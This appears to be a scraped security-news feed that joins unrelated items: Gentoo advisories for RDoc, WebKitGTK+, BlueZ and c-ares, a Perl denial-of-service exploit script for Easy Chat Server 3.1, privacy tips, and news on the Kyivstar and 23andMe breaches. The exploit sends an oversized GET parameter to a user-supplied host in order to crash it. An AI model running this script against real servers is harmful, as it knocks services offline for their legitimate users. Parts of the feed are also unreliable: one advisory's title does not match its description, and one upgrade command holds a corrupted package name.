Gentoo Linux Security Advisory 202401-5 - A vulnerability has been found in RDoc which allows for command injection. Versions greater than or equal to 6.3.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: RDoc: Command Injection  
     Date: January 05, 2024  
     Bugs: #801301  
       ID: 202401-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in RDoc which allows for command  
injection.

Background  
=========  
RDoc produces HTML and command-line documentation for Ruby projects.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-ruby/rdoc  < 6.3.2       >= 6.3.2

Description  
==========  
A vulnerability has been discovered in RDoc. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
RDoc used to call Kernel#open to open a local file. If a Ruby project  
has a file whose name starts with | and ends with tags, the command  
following the pipe character is executed. A malicious Ruby project could  
exploit it to run an arbitrary command execution against a user who  
attempts to run the rdoc command.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All RDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-ruby/rdoc-6.3.2"

References  
=========  
[ 1 ] CVE-2021-31799  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31799

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-05

Gentoo Linux Security Advisory 202401-4 - Several vulnerabilities have been found in WebKitGTK+, the worst of which can lead to remote code execution. Versions greater than or equal to 2.42.3:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: January 05, 2024  
     Bugs: #907818, #909663, #910656, #918087, #918099, #919290  
       ID: 202401-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Several vulnerabilities have been found in WebKitGTK+, the worst of  
which can lead to remote code execution.

Background  
=========  
WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.42.3:4    >= 2.42.3:4  
                                   >= 2.42.3:4.1  
                                   >= 2.42.3:6

Description  
==========  
Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All WebKitGTK+ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.42.3"

References  
=========  
[ 1 ] CVE-2023-28198  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28198  
[ 2 ] CVE-2023-28204  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28204  
[ 3 ] CVE-2023-32370  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32370  
[ 4 ] CVE-2023-32373  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32373  
[ 5 ] CVE-2023-32393  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32393  
[ 6 ] CVE-2023-32439  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32439  
[ 7 ] CVE-2023-37450  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37450  
[ 8 ] CVE-2023-38133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38133  
[ 9 ] CVE-2023-38572  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38572  
[ 10 ] CVE-2023-38592  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38592  
[ 11 ] CVE-2023-38594  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38594  
[ 12 ] CVE-2023-38595  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38595  
[ 13 ] CVE-2023-38597  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38597  
[ 14 ] CVE-2023-38599  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38599  
[ 15 ] CVE-2023-38600  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38600  
[ 16 ] CVE-2023-38611  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38611  
[ 17 ] CVE-2023-40397  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40397  
[ 18 ] CVE-2023-42916  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42916  
[ 19 ] CVE-2023-42917  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42917  
[ 20 ] WSA-2023-0006  
      https://webkitgtk.org/security/WSA-2023-0006.html

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-04

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-04

Gentoo Linux Security Advisory 202401-3 - Multiple vulnerabilities have been discovered in Bluez, the worst of which can lead to privilege escalation. Versions greater than or equal to 5.70-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: BlueZ: Privilege Escalation  
     Date: January 05, 2024  
     Bugs: #919383  
       ID: 202401-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Bluez, the worst of  
which can lead to privilege escalation.

Background  
=========  
BlueZ is the canonical bluetooth tools and system daemons package for  
Linux.

Affected packages  
================  
Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
net-wireless/bluez  < 5.70-r1     >= 5.70-r1

Description  
==========  
Multiple vulnerabilities have been discovered in BlueZ. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
An attacker may inject unauthenticated keystrokes via Bluetooth, leading  
to privilege escalation or denial of service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All BlueZ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/bluez-5.70-r1"

References  
=========  
[ 1 ] CVE-2023-45866  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45866

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-03

Gentoo Linux Security Advisory 202401-2 - Multiple vulnerabilities have been found in c-ares, the worst of which could result in the loss of confidentiality or integrity. Versions greater than or equal to 1.19.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: c-ares: Multiple Vulnerabilities  
     Date: January 05, 2024  
     Bugs: #807604, #807775, #892489, #905341  
       ID: 202401-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in c-ares, the worst of which  
could result in the loss of confidentiality or integrity.

Background  
=========  
c-ares is a C library for asynchronous DNS requests (including name  
resolves).

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
net-dns/c-ares  < 1.19.0      >= 1.19.0

Description  
==========  
Multiple vulnerabilities have been discovered in c-ares. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All c-ares users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-dns/c-ares-1.19.0"

References  
=========  
[ 1 ] CVE-2021-3672  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3672  
[ 2 ] CVE-2021-22930  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22930  
[ 3 ] CVE-2021-22931  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22931  
[ 4 ] CVE-2021-22939  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22939  
[ 5 ] CVE-2021-22940  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22940  
[ 6 ] CVE-2022-4904  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4904

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-02

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-02

Easy Chat Server version 3.1 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 05 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view  
# Notification vendor: No reported  
# Tested Version:Easy Chat Server 3.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x90" x 16;  
    $payload = "\x41"x568;

my $buffer = "GET /chat.ghp?username=" . $payload . "&password=&room=2 HTTP/1.1\r\n";  
$buffer .= "User-Agent: Internet Explorer/4.0\r\n";  
$buffer .= "Host: $ip:$port\r\n";  
$buffer .= "Referer: http://$ip\r\n";  
$buffer .= "Connection: Keep-Alive\r\n\r\n";

print("[+] Exploiting...\n");  
my $socket = IO::Socket::INET->new(  
    PeerAddr => $ip,  
    PeerPort => $port,  
    Proto    => 'tcp',  
) or die "Could not connect! Error: $!\n";

$socket->send($buffer);  
close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           Easy Chat Server 3.1 - Denied of Service            #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Easy Chat Server 3.1 Denial Of Service

Being fully anonymous is next to impossible—but you can significantly limit what the internet knows about you by sticking to a few basic rules.

Beyond the web, trackers embedded in your mobile applications can gather data on your activity. On Android, you should turn off personalized ads through Google’s My Ad Center, simply toggling the setting to off. Also, delete your device’s advertising ID by going to **Settings, Privacy**, **Ads** and clicking on the **Delete advertising ID** option. There are also Android apps that will block cross-app trackers, such as DuckDuckGo’s browser app or the University of Oxford–developed TrackerControl. If you use iOS, go to **Settings,** **Privacy & Security, Tracking,** and toggle off **Allow Apps to Request to Track** to stop apps from tracking you across apps and websites.

For some people, a VPN may be useful for stopping their internet service provider from viewing their web traffic. VPNs can, however, see your online activity—in some cases keeping logs of it—and many are problematic. Our is Mullvad’s VPN, which is open source and accepts payments via cash mailed to its offices in Sweden.

Pick the Most Private Option

Every app, website, and service you use is likely to collect some data about you, but some collect more than others. Picking services that purposefully don’t collect information about you or that use end-to-end encryption, which stops companies from seeing the contents of your communications or data transfers, can help limit your exposure to the web. Generally, you want to avoid Big Tech.

For messaging, Signal collects very little information about who uses it, and it’s encrypted by default, meaning it cannot see the contents of the messages you send. For searching, DuckDuckGo, Brave Search, Kagi, Startpage, and Mojeek are our picks of the most privacy friendly search engines. For email, Proton and Tuta (formerly Tutanota) provide free end-to-end encryption options. OnionShare uses the Tor network to allow you to anonymously share files. Proton Drive offers encrypted file storage online, and Apple’s advanced data protection settings allow iCloud storage to be end-to-end encrypted once it is enabled.

If you're using a work laptop or phone, it's also worth keeping in mind that your employer can likely see many, if not all, of the things you do on those devices. If you're searching for a new job or running personal tasks, you likely want to do them on personal devices.

Check What You Post

As much as anything, being more anonymous online is linked to your mentality. Simply put, the less you share about yourself online, the less identifiable you will be. That means being careful about what you post on social media—not sharing information that could identify you, your location, or others around you.

For instance, if you want to create a new social media account that’s not tied to your identity, keep any names or personal information out of the account name. You should also not sign up using your primary phone number, email address, physical address, or any similar information that could be linked back to you. This doesn’t apply just to a new account you’re creating; it should be the wider way you think about all of your online behavior.

How to Be More Anonymous Online

Ukrainian cybersecurity authorities have disclosed that the Russian state-sponsored threat actor known as Sandworm was inside telecom operator Kyivstar's systems at least since May 2023.
The development was first reported by Reuters.
The incident, described as a "powerful hacker attack," first came to light last month, knocking out access to mobile and internet services

Cyber Attack / Data Breach

Ukrainian cybersecurity authorities have disclosed that the Russian state-sponsored threat actor known as Sandworm was inside telecom operator Kyivstar's systems at least since May 2023.

The development was first reported by Reuters.

The incident, described as a "powerful hacker attack," first came to light last month, knocking out access to mobile and internet services for millions of customers. Soon after the incident, a Russia-linked hacking group called Solntsepyok took responsibility for the breach.

Solntsepyok has been assessed to be a Russian threat group with affiliations to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), which also operates Sandworm.

The advanced persistent threat (APT) actor has a track record of orchestrating disruptive cyber attacks, with Denmark accusing the hacking outfit of targeting 22 energy sector companies last year.

Illia Vitiuk, head of the Security Service of Ukraine's (SBU) cybersecurity department, said the attack against Kyivstar wiped out nearly everything from thousands of virtual servers and computers.

The incident, he said, "completely destroyed the core of a telecoms operator," noting the attackers had full access likely at least since November, months after obtaining an initial foothold into the company's infrastructure.

"The attack had been carefully prepared during many months," Vitiuk said in a statement shared on the SBU's website.

Kyivstar, which has since restored its operations, said there is no evidence that the personal data of subscribers has been compromised. It's currently not known how the threat actor penetrated its network.

It's worth noting that the company had previously dismissed speculations about the attackers destroying its computers and servers as "fake."

The development comes as the SBU revealed earlier this week that it took down two online surveillance cameras that were allegedly hacked by Russian intelligence agencies to spy on the defense forces and critical infrastructure in the capital city of Kyiv.

The agency said the compromise allowed the adversary to gain remote control of the cameras, adjust their viewing angles, and connect them to YouTube to capture "all visual information in the range of the camera."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Had Covert Access to Ukraine's Telecom Giant for Months

Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection.

**Firefly III allows webhooks HTML Injection.**

Moderate severity GitHub Reviewed Published Jan 5, 2024 to the GitHub Advisory Database • Updated Jan 5, 2024

GHSA-vwv2-9wcj-64vx: Firefly III allows webhooks HTML Injection.

### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5pq7-52mg-hr42. This link is maintained to preserve external references.

### Original Description
httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-g47j-3m2m-74qv

**Duplicate Advisory: httparty has multipart/form-data request tampering vulnerability**

Moderate severity GitHub Reviewed Published Jan 4, 2024 to the GitHub Advisory Database • Updated Jan 5, 2024

Withdrawn This advisory was withdrawn on Jan 5, 2024

**Package**

**Affected versions**

<= 0.20.0

**Description**

Published by the National Vulnerability Database

Jan 4, 2024

Published to the GitHub Advisory Database

Jan 4, 2024

GHSA-g47j-3m2m-74qv: Duplicate Advisory: httparty has multipart/form-data request tampering vulnerability

By Waqas
According to DNA service provider 23andMe, if you are a user, you are to be blamed for reusing your password on other sites.
This is a post from HackRead.com Read the original post: 23andMe blames its users for the massive data breach

In a lawsuit stemming from a data breach, DNA service provider 23andMe has drawn sharp criticism for its response letter, in which it attempts to pin the blame on the affected customers.

In October 2023, 23andMe, the popular DNA testing company based in Mountain View, California, **experienced a data breach**. During this incident, hackers exposed the personal information of more than 7 million customers.

Additionally, another hacker attempted to sell genetic records of 23andMe users for $100,000 for a bundle of 100,000 profiles. The information taken by the hackers in the data breach included the following details:

*   **Names**
*   **Genders**
*   **Birth years**
*   **Ancestry reports**
*   **Some DNA data**
*   **Self-reported locations**
*   **Predicted relationships**
*   **Most recent login dates**
*   **Relationship labels (e.g., “mother,” “cousin”)**
*   **Health-related information based on genetic profiles**
*   **Percentage of DNA shared with DNA Relatives matches**

As a consequence of the data breach, 23andMe is facing a lawsuit. In a letter filed in the Circuit Court of Cook County, the company attributed the data breach to customers themselves, contending that the breach occurred because users reused their login credentials.

Specifically, the company claims, users employed the same usernames and passwords on 23andMe as on other websites that had experienced previous security breaches. According to 23andMe, this practice and users’ failure to update their passwords after these incidents were unrelated to any security lapses on 23andMe’s part.

The **letter** also claims that threat actors could not have caused “pecuniary harm_”_ as it lacked Personal Identifiable Information (PII) data, such as social security number, driver’s license number, or any payment or financial information.

> _“… unauthorized actors managed to access certain user accounts in instances where users recycled their own login credentials—that is, users used the same usernames and passwords used on 23andMe.com as on other websites that had been subject to prior security breaches, and users negligently recycled and failed to update their passwords following these past security incidents, which are unrelated to 23andMe.”_ “_Additionally, the information that the unauthorized actor potentially obtained about plaintiffs could not have been set to cause pecuniary harm (it did not include their social security number, driver’s license number, or any payment or financial information)_._”_
> 
> 23andMe

It is worth noting that initially, 23andMe claimed only 14,000 accounts were directly compromised, stating the hackers used “**credential stuffing**“, meaning stolen login credentials from other websites were used to access 23andMe accounts. This led some to criticize the company for suggesting user negligence played a role in the breach.

However, further investigation revealed the attackers accessed information from a much larger number of profiles: 5.5 million **DNA** Relatives profiles and 1.4 million Family Tree profiles connected to the compromised accounts. While 23andMe still maintains the initial breach involved 14,000 accounts, this broader access to information fueled criticism that the company downplayed the severity of the incident.

23andme leaked on a popular Russian hacker and cybercrime forum (Screenshot: Hackread.com)

It’s important to note that relying solely on passwords is considered a security vulnerability. This is why many experts advocate for **two-factor authentication (2FA)** as an additional layer of security. Interestingly, 23andMe introduced mandatory 2FA for all users after the breach, suggesting they acknowledged the password-only system wasn’t sufficient.

For insights into 23andMe’s claims, we reached out to **Nick Rago**, Field CTO at **Salt Security**, adds:, who emphasised that, “In this age of sophisticated social engineering attacks, any claim that a data breach can not cause “pecuniary harm” because it did not consist of social security numbers, driver’s license number, or credit card data has to be done tongue in cheek._”_

Nick countered 23andMe’s version of things explaining hackers do not require PII data to harm unsuspecting users, especially with the emergence of deepfake and AI technologies. Nick also warned that revealing genealogy or relationship details can aid attackers in constructing targeted social engineering attacks on both small and large scales.

“Exposing any genealogy or relationship information would be quite useful to an attacker when building a targeted social engineering attack, whether it be targeted at scamming a consumer, stealing an identity, or as a phase of a more sophisticated attack campaign, such as getting privileged system access in a corporate infrastructure_,”_ said Nick.

**Erfan Shadabi**, Cybersecurity Expert at **comforte AG**, told Hackread.com, “Attributing the entirety of blame to users is a flawed argument that oversimplifies the complex landscape of cybersecurity. While it is true that users must follow best practices for account safety, companies also must protect the sensitive information that has been entrusted to them. It is admirable that 23andMe has taken the recent step of requiring two-factor authentication (2FA) to strengthen defences against credential-stuffing attacks._”_

****_RELATED ARTICLES_****

1.  **DNA testing website MyHeritage hacked; 92M user accounts stolen**
2.  **Researchers Encode Physical DNA with Malware to Infect Computers**
3.  **Software firm leaks 25GB worth of subscription, Ancestry.com user data**

Tag

#web